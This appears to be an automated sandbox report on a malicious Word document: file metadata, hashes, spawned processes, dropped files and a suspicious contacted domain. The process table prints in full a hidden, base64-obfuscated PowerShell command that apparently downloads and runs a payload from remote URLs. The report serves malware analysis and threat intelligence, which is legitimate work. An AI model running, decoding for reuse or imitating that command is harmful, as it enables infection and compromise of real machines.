File name: | 4236042697f72d0a788466203d7734fdb493cddb8c6de52f04fd25d917f1e5c8 |
Full analysis: | https://app.any.run/tasks/a7ff2bb5-e523-435c-bc71-20530cd28556 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 10:40:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 55796Edaxahyjar24990, Subject: 67164Edaxahyj91503, Author: 6014Ocazhulifuf16662, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 29 15:17:00 2018, Last Saved Time/Date: Tue May 29 15:17:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0 |
MD5: | C22E326D81FEC1E57781E9F483E1A2A6 |
SHA1: | 169373945F7A5A365C2D0D39D4DAF9A8983F936C |
SHA256: | 4236042697F72D0A788466203D7734FDB493CDDB8C6DE52F04FD25D917F1E5C8 |
SSDEEP: | 1536:abUDKIqZ4YY9NFSshlnAp/9Mx/vCPmakCY/+gRg4wr1FABA/7UsH:S+KDYD8szu9Mx/QJEvwr1SBA/7 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
---|---|
CompObjUserTypeLen: | 32 |
Category: | 48881Edaxahyj71457 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 9 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | 47842Edaxahyjarad84268 |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 9 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2018:05:29 14:17:00 |
CreateDate: | 2018:05:29 14:17:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | 6014Ocazhulifuf16662 |
Subject: | 67164Edaxahyj91503 |
Title: | 55796Edaxahyjar24990 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3376 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4236042697f72d0a788466203d7734fdb493cddb8c6de52f04fd25d917f1e5c8.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4048 | PowersHeLL -WinDowsTyle hidden -e KAAoACIAewAyADYAfQB7ADEANwB9AHsAOAB9AHsAMQB9AHsAMQA1AH0AewA2ADcAfQB7ADIAOAB9AHsAMwAwAH0AewA2ADEAfQB7ADUAOQB9AHsAMAB9AHsANQB9AHsANwAyAH0AewA2ADAAfQB7ADQANQB9AHsANwB9AHsANAAxAH0AewAyADAAfQB7ADUANgB9AHsAMQA4AH0AewA0ADAAfQB7ADEAMQB9AHsANAAzAH0AewAyADEAfQB7ADYAOAB9AHsAMgA0AH0AewAxADMAfQB7ADMAfQB7ADMANgB9AHsAMwA0AH0AewA1ADcAfQB7ADUAMAB9AHsAMgAzAH0AewA2ADkAfQB7ADYAfQB7ADUAMQB9AHsAOQB9AHsANQA4AH0AewAzADIAfQB7ADYANQB9AHsAMgAyAH0AewAzADMAfQB7ADQAOAB9AHsANwAwAH0AewA1ADQAfQB7ADEANAB9AHsANgAyAH0AewA1ADIAfQB7ADMANwB9AHsAMQA2AH0AewA0ADcAfQB7ADYANgB9AHsAMwA5AH0AewA0AH0AewAyADcAfQB7ADYAMwB9AHsANAA5AH0AewAxADAAfQB7ADQANgB9AHsANAAyAH0AewAyADkAfQB7ADIAfQB7ADUANQB9AHsAMQA5AH0AewAzADEAfQB7ADcAMQB9AHsAMwA1AH0AewAzADgAfQB7ADYANAB9AHsANQAzAH0AewAyADUAfQB7ADEAMgB9AHsANAA0AH0AIgAtAGYAIAAnACAAPQAnACwAJwBlAFAANgB6ACsAUAA2AHoAdwAtAG8AJwAsACcAUQBTAEQAQwApADsAJgAnACwAJwB0AHYALgBwAGgAcAA/ACcALAAnADgAOQBaAE8AJwAsACcAIAAuACgAUAA2ACcALAAnAHgAJwAsACcAegApACAAUwAnACwAJwA2AHoAKwBQADYAegAnACwAJwA2AHoAKwBQADYAegBlAFAANgB6ACcALAAnAGYAYwAuAGkAJwAsACcAPQAgAFAANgB6AA0ACgBoAHQAdABwADoALwAnACwAJwA7AH0AYwBhAHQAYwBoACcALAAnAFIALwB0AGUAcwAnACwAJwB5ACcALAAnAGIAJwAsACcAaQAnACwAJwAgAD0AIAAmACgAUAA2AHoAbgBQACcALAAnAHgAUQBuAHMAYQBkAGEAcwBkAC4AbgBlAHgAdAAoADEAMAAwADAAMAAsACAAMgA4ADIAMQAzADMAKQA7AGoAeABRACcALAAnAG4AdgAnACwAJwBlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAagB4AFEATgBTAEIAIAA9ACAAJwAsACcAZwA5ADQAcQAxAHcAOABkAHEAdwAuAGMAbwAnACwAJwBRAGEAcwBmAGMAIAAnACwAJwAgACsAIAAnACwAJwBLAE8AJwAsACcAYQBrACcALAAnAGoAeABRAG4AcwBhAGQAYQBzAGQAJwAsACcAYQBkAEYASQA4ADkAWgBsAGUAaQBUAGYAKABqAHgAUQAnACwAJwBQADYAegArAFAANgB6AHQAUAA2AHoAKQAgAHIAJwAsACcAKQAsACAAagB4ACcALAAnAGEAbgBkAG8AJwAsACcAbwBQADYAegArAFAANgB6AGsAUAA2ACcALAAnADsAZgAnACwAJwBpACcALAAnAFMAcABsACcALAAnAFAANgB6ACcALAAnAGwAPQBhAG4AbwBwAGsAYQA3AC4AeQBhAHIAbgBQADYAegAuACcALAAnAC4AJwAsACcAKQAoAGoAeABRAFMAJwAsACcAbAAnACwAJwBBAEQAQwBYACAAJwAsACcAeQBzAHQAJwAsACcAdAByADgAOQBaAGkAOAA5AFoATgBnAGkAVABmACgAJwAsACcALwAnACwAJwB7AH0AfQAnACwAJwArAFAANgB6AHcAUAA2AHoAKwBQADYAegAtAG8AYgBqAGUAYwB0AFAANgAnACwAJwBUAGYAVABvAFMAJwAsACcAVABmACcALAAnAG4AIABqAHgAUQBBACcALAAnAHMAJwAsACcAIABQADYAegBaAGYAOQBQADYAegAnACwAJwBQACcALAAnAFUAJwAsACcAKQA7AGIAcgBlACcALAAnACkAewB0AHIAJwAsACcAKABQADYAegBJACcALAAnAGoAJwAsACcAaQB0ACgAUAA2AHoAQABQADYAegApADsAagB4AFEAUwBEAEMAIAA9ACAAagB4AFEAZQBuAHYAOgBwAHUAYgBsAGkAYwAgACsAJwAsACcAKQAnACwAJwBRAFkAWQBVACcALAAnAFAANgB6ACcALAAnAG0AOwBqAHgAJwAsACcAewBqAHgAUQBZAFkAJwAsACcAYQAnACwAJwBEAEMAJwAsACcAbwByAGUAYQBjAGgAKABqAHgAJwAsACcARABvADgAOQBaAFcAbgAnACwAJwBqAGUAYwAnACwAJwBtAC8AJwAsACcAagB4AFEATgBTAEIAIAArACAAKABQADYAegAuAGUAJwAsACcARABDAFgAJwAsACcAegArAFAANgB6AGUALQBJAHQAZQBtACcALAAnAHoAbgBlACcAKQApAC4AcgBFAFAATABBAEMARQAoACcAaQBUAGYAJwAsAFsAUwBUAFIASQBOAEcAXQBbAGMAaABBAFIAXQAzADQAKQAuAHIARQBQAEwAQQBDAEUAKAAoAFsAYwBoAEEAUgBdADUANgArAFsAYwBoAEEAUgBdADUANwArAFsAYwBoAEEAUgBdADkAMAApACwAWwBTAFQAUgBJAE4ARwBdAFsAYwBoAEEAUgBdADkANgApAC4AcgBFAFAATABBAEMARQAoACgAWwBjAGgAQQBSAF0AOQAwACsAWwBjAGgAQQBSAF0AMQAwADIAKwBbAGMAaABBAFIAXQA1ADcAKQAsACcAXAAnACkALgByAEUAUABMAEEAQwBFACgAKABbAGMAaABBAFIAXQAxADAANgArAFsAYwBoAEEAUgBdADEAMgAwACsAWwBjAGgAQQBSAF0AOAAxACkALAAnACQAJwApAC4AcgBFAFAATABBAEMARQAoACgAWwBjAGgAQQBSAF0AOAAwACsAWwBjAGgAQQBSAF0ANQA0ACsAWwBjAGgAQQBSAF0AMQAyADIAKQAsAFsAUwBUAFIASQBOAEcAXQBbAGMAaABBAFIAXQAzADkAKQB8AC4AKAAgACQAZQBuAFYAOgBjAE8ATQBTAFAARQBDAFsANAAsADEANQAsADIANQBdAC0ASgBvAEkAbgAnACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREDE7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4048 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76LRIP2PQCJZD2QOO627.temp | — | |
MD5:— | SHA256:— | |||
4048 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$36042697f72d0a788466203d7734fdb493cddb8c6de52f04fd25d917f1e5c8.doc | pgc | |
MD5:D761EEC0E8CC75251B96A648060EA868 | SHA256:9287D097B6210AF0ECE2D4A392597151B8614AF75708B1C07AD2987CCAE08906 | |||
4048 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11f980.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:59B915F43B43901FA79C60151EA8042C | SHA256:836805470EEA2E00AAEE4008E313688C272B90045958CE36BDA26A66D9A0F169 |
Domain | IP | Reputation |
---|---|---|
g94q1w8dqw.com |
| suspicious |